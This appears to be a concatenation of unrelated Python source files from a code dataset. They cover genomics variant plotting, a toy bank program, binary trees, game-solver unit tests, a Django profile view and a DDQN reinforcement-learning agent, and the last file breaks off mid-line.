df_complete = pd.concat([df_100, df_100_hi, df_100_sfari], axis=1).T\\\n .reset_index()\n \n return df_complete\n\n#Functions to prepare for permutation enrichment analysis\n\ndef assemble_simulations(path):\n '''new version where shuffle_summary for everything is already generated by\n XY and allows to load with a category.'''\n \n df = pd.read_csv(path, sep='\\t')\n \n df.rename({'hg19_early_timing_PMID19966280': 'early_timing_PMID19966280',\n 'hg19_late_timing_PMID19966280': 'late_timing_PMID19966280'},\n axis=1, inplace=True)\n \n df.sort_values(by='GROUP', inplace=True)\n \n groups = df.GROUP.unique().tolist()\n mscs = ['1_sperm', '2_shared', '3_soma_y', '4_soma_o']\n cats = ['cc', 'gnomAD', 'ssc']\n \n mscs_cats = [(cat, msc) for cat in cats for msc in mscs]\n \n dictionary = {grp: msc_cat for grp, msc_cat in zip(groups, mscs_cats)}\n \n df['CATEGORY_ShufgnoSSC'] = df.apply(lambda row: dictionary[row.GROUP][0],\n axis=1)\n \n df['MUTSIG_CLASS'] = df.apply(lambda row: dictionary[row.GROUP][1], axis=1)\n \n df = df.groupby(['CATEGORY_ShufgnoSSC', 'MUTSIG_CLASS'])\\\n .describe(percentiles=[0.025, 0.975])\n \n df.reset_index(inplace=True)\n \n return df\n\n\ndef load_actual_fractions(path):\n '''percentage_of_features.csv; no changing required. use the PERCENTAGE\n column for the fraction readout.'''\n \n return pd.read_csv(path)\n\n\ndef process_lymph_semi(path):\n '''import .csv with all data from lymphona or seminoma.'''\n \n df = pd.read_csv(path)\n \n df.rename({'hg19_early_timing_PMID19966280': 'early_timing_PMID19966280',\n 'hg19_late_timing_PMID19966280': 'late_timing_PMID19966280'},\n axis=1, inplace=True)\n \n df['One'] = 1\n df['Zonk'] = 'zonk'\n df_ = df.groupby('Zonk').sum()\n df_ = df_.apply(lambda row: row / row['One'], axis=1)\n df_ = df_.stack().reset_index().sort_values('level_1')\n \n return df_\n\n\n#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#Plotting\ndef plot_category_counts(df):\n '''simplified and optimized version to plot for this specific problem. Can\n be more customizable if not using a split first frame and giving the cats\n of interest as an argument.'''\n \n categories = ('IS_MOSAIC', 'SET_EXON', 'SET_IMPACT_GENE')\n ranges = (-0.3, -0.1, 0.1, 0.3)\n colors=['g', 'xkcd:brown', 'xkcd:golden', 'xkcd:orangish red'] \n fig = plt.figure()\n \n axs = []\n \n for i in [1,4]: #suplots start at 1, not 0\n axs.append(fig.add_subplot(2,3,i))\n for i in range (2,4):\n axs.append(fig.add_subplot(1,3,i))\n \n for i in range(len(axs)):\n \n if i == 0:\n cat = categories[0]\n elif i == 1:\n cat = categories[0]\n else:\n cat = categories[i-1]\n \n df_, df_s = make_summary_table_with_CI(df, cat)\n df_['PLOTTER'] = cat\n df_s['PLOTTER'] = cat\n df_s.sort_values(by='MUTSIG_CLASS', inplace=True)\n \n sns.stripplot(x='PLOTTER', y='POS1', hue='MUTSIG_CLASS', data=df_s,\n dodge=True, ax=axs[i], alpha=0.5, s=4, palette=colors)\n axs[i].errorbar(x=ranges, y=df_['mean'],\n yerr=np.subtract(df_['95CI_UPPER'], df_['mean']),\n marker='d', ms=10, mfc='k',mec ='k', ecolor='k', ls='',\n capsize=5)\n \n plt.subplots_adjust(hspace=0.1)\n \n axs[0].set_ylim(50,500)\n axs[0].set_yticks([50, 250, 500])\n axs[0].set_xticks([])\n axs[0].set_xlabel('')\n axs[0].set_xticklabels('')\n axs[0].set_ylabel('Number of Mosaic Variants')\n \n axs[1].set_ylim(0,50)\n axs[1].set_yticks([0, 25, 50])\n axs[1].set_xlabel('All Variants')\n axs[2].set_ylim(-0.5, 20)\n axs[2].set_yticks([0, 5, 10, 15, 20])\n axs[2].set_xlabel('Exonic Variants')\n axs[3].set_ylim(-0.2, 6)\n axs[3].set_yticks([0, 2, 4, 6])\n axs[3].set_xlabel('CADD > 25/LoF')\n \n sns.despine(bottom=True, offset=5, trim=True, ax=axs[0])\n \n for i in range(1,4):\n axs[i].get_legend().remove()\n axs[i].set_ylabel('')\n axs[i].set_xticks([])\n axs[i].set_xticklabels('')\n sns.despine(bottom=True, offset=5, trim=True, ax=axs[i])\n \n plt.show()\n\n\ndef plot_estimates(df):\n \n df = make_estimation_table(df)\n \n sns.pointplot()\n #fix, as sns.despine does not work with categorical other than sns\n #same is true for the post-labeling\n plt.errorbar(x=[0,1,2], y=df['mean'],\n yerr=np.subtract(df['mean'], df['95CI_LOWER']), marker='d',\n ms=10, mfc='k',mec ='k',ls='', capsize=5, ecolor='k')\n \n plt.ylim(0,50)\n plt.ylabel('Number of Variants per 100 Men')\n sns.despine(offset=5, trim=True)\n plt.xticks(ticks=[0,1,2], labels=df['SUBGROUP'].tolist(), rotation=45)\n \n plt.xticks()\n \n plt.show()\n\n#------------------------------------------------------------------------------\ndef plot_anno_sims(df, sims, category='cc'):\n '''input is the mos_nob table and the assembled sims results.'''\n \n sims = sims[sims.CATEGORY_ShufgnoSSC == category]\n sims.drop('CATEGORY_ShufgnoSSC', axis=1, inplace=True)\n sims.set_index('MUTSIG_CLASS', inplace=True)\n \n colors=['g', 'xkcd:brown', 'xkcd:golden', 'xkcd:orangish red'] \n \n columns = list(set([col[0] for col in sims.columns]))\n columns.sort()\n \n ranges = make_ranges(columns)\n \n df = df.copy()[columns + ['MUTSIG_CLASS', 'IS_MOSAIC']]\n \n df['wgEncodeRegTfbsClusteredV3'] = df.wgEncodeRegTfbsClusteredV3.fillna(0)\\\n .apply(lambda x: x != 0)\n df['wgEncodeRegDnaseClusteredV3'] = df.apply(lambda row:\n row.wgEncodeRegDnaseClusteredV3 == True,\n axis=1)\n \n df_ = df.groupby('MUTSIG_CLASS').sum()\n \n #is_mosaic was all 1, so effectively replaces a SUM column\n df_ = df_.apply(lambda row: row / row['IS_MOSAIC'], axis=1)\n df_.reset_index(inplace=True)\n \n df_ = df_.groupby(['IS_MOSAIC', 'MUTSIG_CLASS']).sum().stack()\\\n .reset_index()\n df_.sort_values(by=['level_2', 'MUTSIG_CLASS'], inplace=True)\n \n sims_ = sims.unstack().reset_index()\\\n .sort_values(by=['level_0', 'MUTSIG_CLASS'])\n means = sims_[sims_.level_1 == 'mean'][0]\n errors = sims.stack().stack().unstack(1).reset_index()\\\n .sort_values(by=['level_1', 'MUTSIG_CLASS'])\\\n [['2.5%', '97.5%']]\n minus = abs(errors['2.5%'].values - means.values)\n plus = abs(means.values - errors['97.5%'].values)\n errors_plotting = [minus, plus]\n \n ecolors = ['0.5' if((value >= error_lst[0]) & (value <= error_lst[1]))\n else 'r'\n for value, error_lst in zip(df_[0].values, errors.values)]\n \n #actual plotting\n sns.stripplot(x='level_2', y=0, hue='MUTSIG_CLASS', data=df_,\n palette=colors, dodge=True, jitter=False)\n \n plt.errorbar(x=ranges, y=means, yerr=errors_plotting, linestyle='',\n marker='_', mfc='0.5', mec='0.5', alpha=0.5, elinewidth=5,\n ecolor=ecolors)\n \n plt.ylim(0,0.71)\n plt.xlabel('')\n plt.ylabel('Fraction of Variants')\n sns.despine(offset=5, trim=True)\n plt.xticks(rotation=45, ha='right')\n \n ax = plt.gca()\n \n ax.get_legend().remove()\n \n plt.show()\n \ndef make_ranges(columns):\n \n ranges = []\n \n for i in range(len(columns)):\n ranges.append(i - 0.3)\n ranges.append(i - 0.1)\n ranges.append(i + 0.1)\n ranges.append(i + 0.3)\n \n return ranges\n \n#------------------------------------------------------------------------------\n\ndef plot_anno_fractions(df, fractions):\n '''input is the mos_nob anno df and the fractions from XY.'''\n \n colors=['g', 'xkcd:brown', 'xkcd:golden', 'xkcd:orangish red'] \n \n columns = fractions.ANNO.sort_values().unique().tolist()\n \n ranges = [i for i in range(len(columns))]\n \n df = df.copy()[columns + ['MUTSIG_CLASS', 'IS_MOSAIC']]\n \n df['wgEncodeRegTfbsClusteredV3'] = df.wgEncodeRegTfbsClusteredV3.fillna(0)\\\n .apply(lambda x: x != 0)\n df['wgEncodeRegDnaseClusteredV3'] = df.apply(lambda row:\n row.wgEncodeRegDnaseClusteredV3 == True,\n axis=1)\n \n df_ = df.groupby('MUTSIG_CLASS').sum()\n \n #is_mosaic was all 1, so effectively replaces a SUM column\n df_ = df_.apply(lambda row: row / row['IS_MOSAIC'], axis=1)\n df_.reset_index(inplace=True)\n \n fractions = fractions[~fractions.PERCENTAGE.duplicated()]\n fractions.sort_values(by='ANNO', inplace=True)\n \n df_ = df_.groupby(['IS_MOSAIC', 'MUTSIG_CLASS']).sum().stack()\\\n .reset_index()\n df_.sort_values(by=['level_2', 'MUTSIG_CLASS'], inplace=True)\n \n sns.stripplot(x='level_2', y=0, hue='MUTSIG_CLASS', data=df_,\n palette=colors, dodge=True)\n \n plt.hlines(y=fractions.PERCENTAGE, xmin=np.subtract(ranges, 0.45),\n xmax=np.add(ranges, 0.45), colors='w')\n plt.hlines(y=fractions.PERCENTAGE, xmin=np.subtract(ranges, 0.45),\n xmax=np.add(ranges, 0.45), colors='k', linestyles='dotted')\n \n plt.xticks(rotation=45)\n \n plt.show()\n \n\ndef plot_anno_sims_lymph_semi(df, sims, lymph, semi, category='cc'):\n '''input is the mos_nob table and the assembled sims results. note that for\n exons only the input of the df has to be adjusted accordingly, i.e. the df\n has to be adjusted to include gene region only.'''\n \n sims = sims[sims.CATEGORY_ShufgnoSSC == category]\n sims.drop('CATEGORY_ShufgnoSSC', axis=1, inplace=True)\n sims.set_index('MUTSIG_CLASS', inplace=True)\n \n colors=['g', 'xkcd:brown', 'xkcd:golden', 'xkcd:orangish red'] \n \n columns = list(set([col[0] for col in sims.columns]))\n columns.sort()\n \n ranges = make_ranges(columns)\n \n ranges_lines = [i for i in range(len(columns))]\n \n df = df.copy()[columns + ['MUTSIG_CLASS', 'IS_MOSAIC']]\n \n df['wgEncodeRegTfbsClusteredV3'] = df.wgEncodeRegTfbsClusteredV3.fillna(0)\\\n .apply(lambda x: x != 0)\n df['wgEncodeRegDnaseClusteredV3'] = df.apply(lambda row:\n row.wgEncodeRegDnaseClusteredV3 == True,\n axis=1)\n \n df_ = df.groupby('MUTSIG_CLASS').sum()\n \n lymph = lymph[lymph.level_1.isin(columns)]\n semi = semi[semi.level_1.isin(columns)]\n \n #is_mosaic was all 1, so effectively replaces a SUM column\n df_ = df_.apply(lambda row: row / row['IS_MOSAIC'], axis=1)\n df_.reset_index(inplace=True)\n \n df_ = df_.groupby(['IS_MOSAIC', 'MUTSIG_CLASS']).sum().stack()\\\n .reset_index()\n df_.sort_values(by=['level_2', 'MUTSIG_CLASS'], inplace=True)\n \n sims_ = sims.unstack().reset_index()\\\n .sort_values(by=['level_0', 'MUTSIG_CLASS'])\n means = sims_[sims_.level_1 == 'mean'][0]\n errors = sims.stack().stack().unstack(1).reset_index()\\\n .sort_values(by=['level_1', 'MUTSIG_CLASS'])\\\n [['2.5%', '97.5%']]\n minus = abs(errors['2.5%'].values - means.values)\n plus = abs(means.values - errors['97.5%'].values)\n errors_plotting = [minus, plus]\n \n ecolors = ['0.5' if((value >= error_lst[0]) & (value <= error_lst[1]))\n else 'r'\n for value, error_lst in zip(df_[0].values, errors.values)]\n \n #actual plotting\n sns.stripplot(x='level_2', y=0, hue='MUTSIG_CLASS', data=df_,\n palette=colors, dodge=True, jitter=False)\n \n plt.errorbar(x=ranges, y=means, yerr=errors_plotting, linestyle='',\n marker='_', mfc='0.5', mec='0.5', alpha=0.5, elinewidth=5,\n ecolor=ecolors)\n \n plt.hlines(y=lymph[0], xmin=np.subtract(ranges_lines, 0.45),\n xmax=np.add(ranges_lines, 0.45), colors='w')\n plt.hlines(y=lymph[0], xmin=np.subtract(ranges_lines, 0.45),\n xmax=np.add(ranges_lines, 0.45), colors='r',\n linestyles='dotted')\n \n plt.hlines(y=semi[0], xmin=np.subtract(ranges_lines, 0.45),\n xmax=np.add(ranges_lines, 0.45), colors='w')\n plt.hlines(y=semi[0], xmin=np.subtract(ranges_lines, 0.45),\n xmax=np.add(ranges_lines, 0.45), colors='b',\n linestyles='dotted')\n \n plt.ylim(0,1.)\n plt.xlabel('')\n plt.ylabel('Fraction of Variants')\n sns.despine(offset=5, trim=True)\n plt.xticks(rotation=45, ha='right')\n \n ax = plt.gca()\n \n ax.get_legend().remove()\n \n plt.show()\n \n \n \n \n \n \n \n \n \n\n\n\n\n\n\n\n\n","repo_name":"shishenyxx/Sperm_control_cohort_mosaicism","sub_path":"Plot/cc_annotation_counts02.py","file_name":"cc_annotation_counts02.py","file_ext":"py","file_size_in_byte":16706,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"32600441223","text":"\r\nfrom bank import Bank, Loan\r\nfrom admin import Admin\r\nfrom user import User\r\n\r\ndef main():\r\n bank = Bank()\r\n\r\n admin = Admin(bank)\r\n admin.login()\r\n\r\n bank.create_account(\"user1@example.com\", \"user123\")\r\n bank.create_account(\"user2@example.com\", \"user234\")\r\n\r\n user1 = User(bank, \"user1@example.com\", \"user123\")\r\n user1.login()\r\n\r\n print(' ')\r\n user1.deposit(1000)\r\n user1.check_balance()\r\n\r\n print(' ')\r\n user1.withdraw(500)\r\n user1.check_balance()\r\n\r\n print(' ')\r\n user2 = User(bank, \"user2@example.com\", \"user234\")\r\n user2.login()\r\n\r\n user1.transfer(200, \"user2@example.com\")\r\n user1.check_balance()\r\n user2.check_balance()\r\n\r\n print(' ')\r\n user1.get_transaction_history()\r\n print(' ')\r\n user2.get_transaction_history()\r\n print(' ')\r\n\r\n user1.take_loan()\r\n\r\n admin.check_total_balance()\r\n admin.check_total_loan()\r\n\r\n admin.loan_feature(True)\r\n\r\n user2.take_loan()\r\n\r\n admin.check_total_balance()\r\n admin.check_total_loan()\r\n\r\n print(' ')\r\n user1.logout()\r\n user2.logout()\r\n\r\n admin.logout()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"Tasmia-Mitu/OOP-Final-Exam","sub_path":"OOP_Final_Exam/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6492573598","text":"class Point:\n x = 1\n y = 2\n\n def setCoords(self, x, y):\n self.a = x\n self.b = y\n\npt1 = Point()\npt1.setCoords(5, 10)\nprint( pt1.__dict__ )\n# экввивалент\nPoint.setCoords(pt1, 11, 22)\nprint( pt1.__dict__ )\n\npt2 = Point()\npt2.setCoords(50, 100)\nprint( pt2.__dict__ )","repo_name":"sazanov-ilya/2-classes","sub_path":"#002 методы класса, параметр self, конструктор и деструктор/v2.py","file_name":"v2.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12886918894","text":"class Node(object):\n def __init__(self,value):\n self.value=value\n self.left=None\n self.right= None\n\nclass BinaryTree(object):\n def __init__(self,root):\n self.root = Node(root)\n\n def print_tree(self):\n self.preorder_print(self.root)\n\n def preorder_print(self,node):\n if node is None:\n return\n print(node.value)\n self.preorder_print(node.left)\n self.preorder_print(node.right)\n\n def search(self,key):\n return self.preorder_search(self.root,key)\n\n def preorder_search(self,node,key):\n if node is None:\n return(False)\n\n if node.value == key:\n return(True)\n\n return self.preorder_search(node.left,key) or self.preorder_search(node.right,key)\n\nb = BinaryTree(1)\nb.root.left = Node(2)\nb.root.right = Node(3)\nb.root.left.left = Node(4)\nb.root.left.right = Node(5)\n\nb.print_tree()\n\np = b.search(4)\nprint(p)\np= b.search(100)\nprint(p)","repo_name":"hemanthkumarsheetha/AlgoPractice","sub_path":"Practice/binarytree.py","file_name":"binarytree.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23190027675","text":"from time import sleep\ndef ajuda(com):\n help(com)\n\ndef titulo(msg):\n tam=len(msg)+4\n print('~'*tam)\n print(f' {msg}')\n print('~'*tam)\n\n\nwhile True:\n titulo('SISTEMA DE AJUDA')\n hp= str(input('Função ou biblioteca >'))\n if hp.upper() == 'FIM':\n break\n else:\n print(f\"Acessando o manual de comando '{hp}'...\")\n sleep(2)\n print('~~'*30)\n ajuda(hp)\nprint('FINALIZADO')\n\n\n\n\n","repo_name":"Franky03/MyCodes","sub_path":"Exercises/exe106.py","file_name":"exe106.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"6905832918","text":"import unittest\nimport logging\n\nfrom utils import mylogconfig\nimport models\nfrom models.solver import solve\nfrom models.game_states import GameState\nfrom models.game_trees import set_current_tree\n\n\"\"\" following code doesn't work for debugger --> uncomment\n\"\"\"\nmylogconfig.standard_rot(level=logging.INFO)\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nclass TestSolver(unittest.TestCase):\n\n def all_levels(self, level):\n gs = GameState([0, 0, 1, 0, 0])\n gm, cont = solve(gs, level)\n self.assertTrue(gm is None and cont == -1)\n gs = GameState([1, 0, 1, 0, 0])\n gm, cont = solve(gs, level)\n self.assertTrue(gm.row_index in [0, 2] and gm.match_count == 1 and cont == 0)\n gs = GameState([0, 0, 3, 0, 0])\n gm, cont = solve(gs, level)\n self.assertTrue(gm.row_index == 2 and 1 <= gm.match_count <= 2 and ((gm.match_count == 1) == (cont > 0)))\n\n def test_1init(self):\n gs = GameState([1, 2, 3, 4, 5])\n try:\n solve(gs, 3)\n self.assertTrue(False)\n except models.solver.Error:\n pass\n\n def test_2random(self):\n self.all_levels(0)\n gs = GameState([0, 0, 0, 4, 5])\n gm, cont = solve(gs, 0)\n self.assertTrue(gm.row_index in [3, 4] and 1 <= gm.match_count <= 3 and cont > 0)\n\n def test_3most_first(self):\n self.all_levels(1)\n gs = GameState([1, 2, 3, 4, 5])\n gm, cont = solve(gs, 1)\n self.assertTrue(gm.row_index == 4 and gm.match_count == 3 and cont == 1)\n gs = GameState([0, 0, 3, 2, 1])\n gm, cont = solve(gs, 1)\n self.assertTrue(gm.row_index == 2 and gm.match_count == 3 and cont == 1)\n gs = GameState([0, 2, 1, 1, 1])\n gm, cont = solve(gs, 1)\n self.assertTrue(gm.row_index == 1 and gm.match_count == 2 and cont == 1)\n gs = GameState([0, 2, 0, 0, 1])\n gm, cont = solve(gs, 1)\n self.assertTrue(gm.row_index == 1 and gm.match_count == 2 and cont == 0)\n\n def test_4best(self):\n set_current_tree(GameState([1, 2, 3, 4, 5]))\n self.all_levels(2)\n # winning states\n gs = GameState([0, 2, 1, 1, 1])\n gm, cont = solve(gs, 2)\n self.assertTrue(gm.row_index == 1 and gm.match_count == 2 and cont == 3)\n gs = GameState([1, 2, 3, 4, 5]) # see logs of 12345 in test_game_trees\n gm, cont = solve(gs, 2)\n self.assertTrue(cont == 3)\n # looser states\n gs = GameState([0, 1, 1, 0, 1])\n gm, cont = solve(gs, 2)\n self.assertTrue(gm.match_count == 1 and cont == 2)\n gs = GameState([1, 2, 0, 4, 3]) # see logs of 01234 in test_game_trees\n gm, cont = solve(gs, 2)\n self.assertTrue(gm.match_count == 1 and cont == 2)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"BrunoLustenberger/matchTaker","sub_path":"tests/test_solver.py","file_name":"test_solver.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35358624580","text":"import pytest\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom baal.bayesian.weight_drop import WeightDropLinear, WeightDropConv2d,\\\n patch_module, MCDropoutConnectModule\n\n\nclass DummyDataset(Dataset):\n def __len__(self):\n return 20\n\n def __getitem__(self, item):\n return torch.from_numpy(np.ones([3, 10, 10]) * item / 255.).float(), torch.FloatTensor([item % 2])\n\n\nclass DummyModel(torch.nn.Module):\n def __init__(self):\n super(DummyModel, self).__init__()\n self.conv = torch.nn.Conv2d(3, 8, kernel_size=10)\n self.relu = torch.nn.ReLU()\n self.dropout = torch.nn.Dropout()\n self.linear = torch.nn.Linear(8, 1)\n\n def forward(self, x):\n x = self.conv(x)\n x = self.relu(x)\n x = x.view(x.shape[0], -1)\n x = self.dropout(x)\n x = self.linear(x)\n return x\n\n\n@pytest.mark.parametrize(\"inplace\", (True, False))\n@pytest.mark.parametrize(\"layers\", (['Linear'], ['Linear', 'Conv2d']))\ndef test_patch_module_changes_weights(inplace, layers):\n\n test_module = torch.nn.Sequential(\n torch.nn.Conv2d(3, 8, kernel_size=10),\n torch.nn.ReLU(),\n torch.nn.Dropout(p=0.5),\n torch.nn.Linear(8, 1),\n )\n\n conv_w = list(test_module.modules())[1].weight.clone().detach().numpy()\n linear_w = list(test_module.modules())[-1].weight.clone().detach().numpy()\n\n mc_test_module = patch_module(test_module, layers=layers, weight_dropout=0.2, inplace=inplace)\n\n # objects should be the same if inplace is True and not otherwise:\n assert (mc_test_module is test_module) == inplace\n\n new_linear_w = list(mc_test_module.modules())[-1].weight_raw.clone().detach().numpy()\n if layers == ['Linear']:\n assert isinstance(list(mc_test_module.modules())[-1], WeightDropLinear)\n assert isinstance(list(mc_test_module.modules())[1], torch.nn.Conv2d)\n new_conv_w = list(mc_test_module.modules())[1].weight.clone().detach().numpy()\n assert np.allclose(new_conv_w, conv_w)\n assert not np.allclose(new_linear_w, linear_w)\n else:\n assert isinstance(list(mc_test_module.modules())[-1], WeightDropLinear)\n assert isinstance(list(mc_test_module.modules())[1], WeightDropConv2d)\n new_conv_w = list(mc_test_module.modules())[1].weight_raw.clone().detach().numpy()\n assert not np.allclose(new_conv_w, conv_w)\n assert not np.allclose(new_linear_w, linear_w)\n\n assert list(mc_test_module.modules())[3].p == 0\n\n\ndef test_weight_change_after_forward_pass():\n test_module = DummyModel()\n dataset = DummyDataset()\n mc_test_module = MCDropoutConnectModule(test_module, layers=['Linear'], weight_dropout=0.2)\n\n assert not hasattr(list(test_module.modules())[-1], 'weight')\n linear_w = list(test_module.modules())[-1].weight_raw.clone().detach().numpy()\n\n input, _ = [torch.stack(v) for v in zip(*(dataset[0], dataset[1]))]\n mc_test_module.eval()\n out = mc_test_module(input)\n\n assert hasattr(list(test_module.modules())[-1], 'weight')\n new_linear_w = list(mc_test_module.modules())[-1].weight.clone().detach().numpy()\n assert not np.allclose(new_linear_w, linear_w)\n\n\nif __name__ == '__main__':\n pytest.main()\n","repo_name":"chunmk/baal","sub_path":"tests/bayesian/dropconnect_test.py","file_name":"dropconnect_test.py","file_ext":"py","file_size_in_byte":3242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"30668391693","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect\nfrom .forms import *\nfrom .models import Image, Search\nfrom django.contrib.auth.models import User\nfrom .forms import UserUpdateForm, UpdateProfileForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\n\n\n# Create your views here.\n\ndef profile_page(request):\n\n if request.method == 'POST':\n user_form = UserUpdateForm(request.POST, instance=request.user)\n profile_form = UpdateProfileForm(request.POST,\n request.FILES,\n instance=request.user.image)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request,f'Your account has been updated')\n return redirect('profile')\n else:\n if not request.user.is_authenticated:\n messages.warning(request, ' you need to be logged in to view that!')\n return redirect('login')\n user_form = UserUpdateForm(instance=request.user)\n profile_form = UpdateProfileForm(instance=request.user.image)\n\n\n context = {\n 'user_form': user_form,\n 'profile_from': profile_form\n }\n return render(request, 'home/profile_page.html', context)\n\n\ndef success(request):\n return HttpResponse('successfully uploaded')\n\ndef search_history(request):\n user = User.objects.get(username=request.user)\n if user.is_authenticated:\n history = list(Search.objects.filter(user=user).order_by('-timestamp').values('keyword', 'id'))\n print(history)\n return JsonResponse(history, safe=False)\n else:\n return JsonResponse([], safe=False)\n\n","repo_name":"RagnarSmari/redstarcereal-dev","sub_path":"user_profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71760425642","text":"# coding=utf-8\nfrom OTLMOW.OTLModel.BaseClasses.OTLAttribuut import OTLAttribuut\nfrom OTLMOW.OTLModel.Classes.Abstracten.Proef import Proef\nfrom OTLMOW.OTLModel.Datatypes.DtcDocument import DtcDocument\nfrom OTLMOW.GeometrieArtefact.PuntGeometrie import PuntGeometrie\nfrom OTLMOW.GeometrieArtefact.LijnGeometrie import LijnGeometrie\nfrom OTLMOW.GeometrieArtefact.VlakGeometrie import VlakGeometrie\n\n\n# Generated with OTLClassCreator. To modify: extend, do not edit\nclass ProefLuchtdichtheid(Proef, PuntGeometrie, LijnGeometrie, VlakGeometrie):\n \"\"\"Testen van de drukval van het beproefde leidingsvak.\"\"\"\n\n typeURI = 'https://wegenenverkeer.data.vlaanderen.be/ns/proefenmeting#ProefLuchtdichtheid'\n \"\"\"De URI van het object volgens https://www.w3.org/2001/XMLSchema#anyURI.\"\"\"\n\n def __init__(self):\n Proef.__init__(self)\n LijnGeometrie.__init__(self)\n PuntGeometrie.__init__(self)\n VlakGeometrie.__init__(self)\n\n self.add_valid_relation(relation='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#IsInspectieVan', target='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Buis')\n self.add_valid_relation(relation='https://wegenenverkeer.data.vlaanderen.be/ns/onderdeel#IsInspectieVan', target='https://wegenenverkeer.data.vlaanderen.be/ns/abstracten#Put')\n\n self._luchtdichtheid = OTLAttribuut(field=DtcDocument,\n naam='luchtdichtheid',\n label='luchtdichtheid',\n objectUri='https://wegenenverkeer.data.vlaanderen.be/ns/proefenmeting#ProefLuchtdichtheid.luchtdichtheid',\n definition='Testresultaten van de opgemeten drukval van het beproefde leidingsvak.',\n owner=self)\n\n @property\n def luchtdichtheid(self):\n \"\"\"Testresultaten van de opgemeten drukval van het beproefde leidingsvak.\"\"\"\n return self._luchtdichtheid.get_waarde()\n\n @luchtdichtheid.setter\n def luchtdichtheid(self, value):\n self._luchtdichtheid.set_waarde(value, owner=self)\n","repo_name":"davidvlaminck/OTLMOW","sub_path":"src/OTLMOW/OTLModel/Classes/ProefEnMeting/ProefLuchtdichtheid.py","file_name":"ProefLuchtdichtheid.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"nl","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"45062517299","text":"import torch\nimport torchvision\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom collections import deque\nimport random, datetime, os, copy\nimport network_parser\n\nclass Net(nn.Module):\n def __init__(self, input_dim, output_dim, layer_size=24):\n super().__init__()\n self.online = nn.Sequential(\n nn.Linear(input_dim, layer_size),\n nn.ReLU(),\n nn.Linear(layer_size, layer_size),\n nn.ReLU(),\n nn.Linear(layer_size, output_dim),\n )\n self.target = copy.deepcopy(self.online)\n for p in self.target.parameters():\n p.requires_grad = False\n\n def forward(self, input, model):\n if model == 'online':\n return self.online(input)\n elif model == 'target':\n return self.target(input)\n\nclass DDQN(object):\n def __init__(self, network, plot_dir, save_dir):\n self.network = network\n self.state_dim = self.network.state_dim\n self.action_dim = self.network.action_dim\n self.plot_dir = plot_dir\n self.save_dir = save_dir\n\n self.memory = deque(maxlen=100_000)\n self.batch_size = 32\n self.gamma = 0.5\n\n self.net = Net(self.state_dim, self.action_dim)\n self.optimizer = optim.Adam(self.net.parameters(), lr=5e-3)\n self.loss = nn.MSELoss()\n\n self.epsilon = 1\n self.epsilon_decay = 0.9999\n self.epsilon_min = 0.001\n self.cur_step = 0\n\n self.burnin = 1e4\n self.learn_step = 3\n self.sync_step = 1e4\n self.indicator = False\n self.score_history = list()\n self.avg_score_hisory = list()\n\n def act(self, state):\n if np.random.rand() < self.epsilon:\n action = np.random.randint(self.action_dim)\n else:\n state = torch.tensor(state)\n state = state.unsqueeze(0)\n action_values = self.net(state, model='online')\n action = torch.argmax(action_values, axis=1).item()\n\n self.epsilon *= self.epsilon_decay\n self.epsilon = max(self.epsilon, self.epsilon_min)\n self.cur_step += 1\n return action\n\n def cache(self, state, action, reward, next_state, done):\n state = torch.tensor(state)\n next_state = torch.tensor(next_state)\n action = torch.tensor([action])\n reward = torch.tensor([reward])\n done = torch.tensor([done])\n self.memory.append((state, action, reward, next_state, done))\n\n def recall(self):\n batch = random.sample(self.memory, self.batch_size)\n state, action, reward, next_state, done = map(torch.stack, zip(*batch))\n return state, action.squeeze(), reward.squeeze(), next_state, done.squeeze()\n\n def td_estimate(self, state, action):\n current_Q = self.net(state, model='online')[np.arange(self.batch_size), action]\n return current_Q\n\n @torch.no_grad()\n def td_target(self, reward, next_state, done):\n next_state_Q = self.net(next_state, model='online')\n best_action = torch.argmax(next_state_Q, axis=1)\n next_Q = self.net(next_state, model='target')[np.arange(self.batch_size), best_action]\n return (reward + (1 - done.float()) * self.gamma * next_Q).float()\n\n def update_online(self, td_estimate, td_target):\n loss = self.loss(td_estimate, td_target)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n return loss\n\n def sync_target(self):\n self.net.target.load_state_dict(self.net.online.state_dict())\n\n def learn(self):\n if self.cur_step < self.burnin:\n return None, None\n\n if self.cur_step % self.learn_step != 0:\n return None, None\n\n if self.indicator == False:\n print(\"Start training\")\n self.indicator = True\n\n if self.cur_step % self.sync_step == 0:\n self.sync_target()\n\n state, action, reward, next_state, done = 